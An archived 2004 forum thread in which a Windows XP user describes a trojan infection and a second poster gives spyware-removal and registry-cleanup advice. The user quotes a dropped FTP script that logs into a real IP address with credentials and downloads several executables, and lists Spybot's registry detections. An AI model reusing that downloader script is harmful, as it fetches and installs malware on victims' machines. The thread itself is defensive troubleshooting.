Main Page 
PC Review
Forums
Newsgroups
Windows XP
Windows XP Security
Internet Explorer doesn't upload after viruses/trojans infected my computer...
Forums
Newsgroups
Windows XP
Windows XP Security
Internet Explorer doesn't upload after viruses/trojans infected my computer...
 |
Internet Explorer doesn't upload after viruses/trojans infected my computer... |
|
|
Thread Tools | Rate Thread |
07-10-2004, 08:48 AM
|
#1 |
|
Guest
Posts: n/a
|
Internet Explorer doesn't upload after viruses/trojans infected my computer...
I'm using windows XP. While I was browsing some site (not a porn
one..), suddenly my computer froze up. I disconnected from the internet, and saw various files have been added to my computer. I opened one of the files that got in, a file named 0 (in windowsא system32), and got this: open 207.58.159.14 tmpacct 12345 bin get julie.exe get newdevin.exe get IF01.exe get istinstall_154074.exe get sd.exe get sdmsg.exe get TVM_B5.EXE get 06wu29rd.exe get dp807615.exe bye I tried to run Adaware, it froze halfway through, so I ran it again and before it froze again I aborted, and was able to delete what it found when I aborted– Hkey_classes_root:CLSID\{5F1ABCDB-A875-46c1-8345-B72A4567E486} After that, internet explorer wouldn't launch… I ran Spybot, it found several problems, when I clicked the fix problem button, it froze. Now I cannot launch Internet Explorer – the whole computer freezes up. I'm writing here using Netscape, and would really like to be able to use my explorer again. HELP…. You're my only home practically… How can I fix this? Should I change something in the registery? BTW, the problems spybot found (which I'm unable to fix since the program freezes) are: Avenue A, Inc.: Tracking cookie (Internet Explorer: MYNAME) (Cookie, nothing done) BookedSpace: Browser helper object (Registry key, nothing done) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0019C3E2-DD48-4A6D-ABCD-8D32436323D9} BookedSpace: Class ID (Registry key, nothing done) HKEY_CLASSES_ROOT\CLSID\{0019C3E2-DD48-4A6D-ABCD-8D32436323D9} BookedSpace: Root class (Registry key, nothing done) HKEY_CLASSES_ROOT\BookedSpace.Extension.5 BookedSpace: Root class (Registry key, nothing done) HKEY_CLASSES_ROOT\BookedSpace.Extension BookedSpace: Settings (Registry key, nothing done) HKEY_CLASSES_ROOT\AppID\BookedSpace.DLL DSO Exploit: Data source object exploit (Registry change, nothing done) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3 DSO Exploit: Data source object exploit (Registry change, nothing done) HKEY_USERS\S-1-5-21-2237029002-4258192708-1256799619-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3 DSO Exploit: Data source object exploit (Registry change, nothing done) HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3 DSO Exploit: Data source object exploit (Registry change, nothing done) HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3 DSO Exploit: Data source object exploit (Registry change, nothing done) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3 |
|
|
07-10-2004, 11:30 AM
|
#2 |
|
Guest
Posts: n/a
|
Re: Internet Explorer doesn't upload after viruses/trojans infected my computer...
Disconnect the computer from the wire connection to the Internet. Start your computer in safe mode to positively delete the spyware with Spybot and Adaware... before running both programs, delete the cookies with the buttons in the IExplorer\Tools\Internet Options\General Also delete the Temporary internet Files with the button next to delete cookies Press ctrl+alt+del simultaneously select Processes Tab any process taking most ot the memory (with all programs closed) is most likely the trojan-hijacker-malware.. select it and click End Process and run the anti-spyware programs A description of the Safe Mode Boot Options in Windows XP http://support.microsoft.com/defaul...2&Product=winxp If the problem with the programs should be repeated (rare posibility) and you are unable to delete the spyware, go into the registry and delete the parasites by hand.. go to Start\Run\regedit.msc and hit enter Delete the keys the programs detected (those you mentioned) except for the ones from the DSO Exploit .. For the keys about the DSO Exploit, you have to consider this: The DSO Exploit vulnerability was patched by microsoft, IF you have kept your system updated, the Spybot reading is probably a false reading IF you have not kept your system updated, the reading is probably TRUE and you must delete the keys. One more thing to consider is that the 1004 entry must be a REG_DWORD and not a Alfanumeric Value REG_SZ if it is a REG_SZ, delete it and create a new REG_DWORD with same name 1004 and set to 0 .... Nexto go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Run and Run- both should only have the predetermined alfanumeric value Nexto go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Run\should have the predetermined alfanumeric value and a few other alfa numeric values set there by the antivirus, any other values here should be considered as malicious and should be deleted unless you have installed some program that is set to run at startup. and Run-\should only have the predetermined alfanumeric value and any other value from program you could have installed... if there is someting else there, delete it. Before you try anything, install this program see if it does the job. Run it in safe mode. CoolWWWSearch SmartKiller MiniRemoval http://www.spychecker.com/program/miniremovalcw.html removes CoolWebSearch hijackers. Spybot Search & Destroy (free) http://www.safer-networking.net/ Lavasoft AdAware SE (free) http://www.lavasoft.de SpywareBlaster (free) http://www.javacoolsoftware.com/spywareblaster.html -------------Original Message----------- "barb" <dbarbarela@hotmail.com> escribió en el mensaje news:9c6c9c6d.0410062348.129ebfa3@posting.google.com... > I'm using windows XP. While I was browsing some site (not a porn > one..), suddenly my computer froze up. I disconnected from the > internet, and saw various files have been added to my computer. I > opened one of the files that got in, a file named 0 (in windowsא > system32), and got this: > > open 207.58.159.14 > tmpacct > 12345 > bin > get julie.exe > get newdevin.exe > get IF01.exe > get istinstall_154074.exe > get sd.exe > get sdmsg.exe > get TVM_B5.EXE > get 06wu29rd.exe > get dp807615.exe > bye > > I tried to run Adaware, it froze halfway through, so I ran it again > and before it froze again I aborted, and was able to delete what it > found when I aborted- > Hkey_classes_root:CLSID\{5F1ABCDB-A875-46c1-8345-B72A4567E486} > After that, internet explorer wouldn't launch. > > I ran Spybot, it found several problems, when I clicked the fix > problem button, it froze. > > Now I cannot launch Internet Explorer - the whole computer freezes up. > I'm writing here using Netscape, and would really like to be able to > use my explorer again. HELP.. You're my only home practically. > How can I fix this? Should I change something in the registery? > > BTW, the problems spybot found (which I'm unable to fix since the > program freezes) are: > > Avenue A, Inc.: Tracking cookie (Internet Explorer: MYNAME) (Cookie, > nothing done) > > > BookedSpace: Browser helper object (Registry key, nothing done) > HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browse r > Helper Objects\{0019C3E2-DD48-4A6D-ABCD-8D32436323D9} > > BookedSpace: Class ID (Registry key, nothing done) > HKEY_CLASSES_ROOT\CLSID\{0019C3E2-DD48-4A6D-ABCD-8D32436323D9} > > BookedSpace: Root class (Registry key, nothing done) > HKEY_CLASSES_ROOT\BookedSpace.Extension.5 > > BookedSpace: Root class (Registry key, nothing done) > HKEY_CLASSES_ROOT\BookedSpace.Extension > > BookedSpace: Settings (Registry key, nothing done) > HKEY_CLASSES_ROOT\AppID\BookedSpace.DLL > > DSO Exploit: Data source object exploit (Registry change, nothing > done) > HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet > Settings\Zones\0\1004!=W=3 > > DSO Exploit: Data source object exploit (Registry change, nothing > done) > HKEY_USERS\S-1-5-21-2237029002-4258192708-1256799619-1004\Software\Microsoft \Windows\CurrentVersion\Internet > Settings\Zones\0\1004!=W=3 > > DSO Exploit: Data source object exploit (Registry change, nothing > done) > HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet > Settings\Zones\0\1004!=W=3 > > DSO Exploit: Data source object exploit (Registry change, nothing > done) > HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet > Settings\Zones\0\1004!=W=3 > > DSO Exploit: Data source object exploit (Registry change, nothing > done) > HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet > Settings\Zones\0\1004!=W=3 |
|
|
|
|
| Thread Tools | |
| Rate This Thread | |
|
|
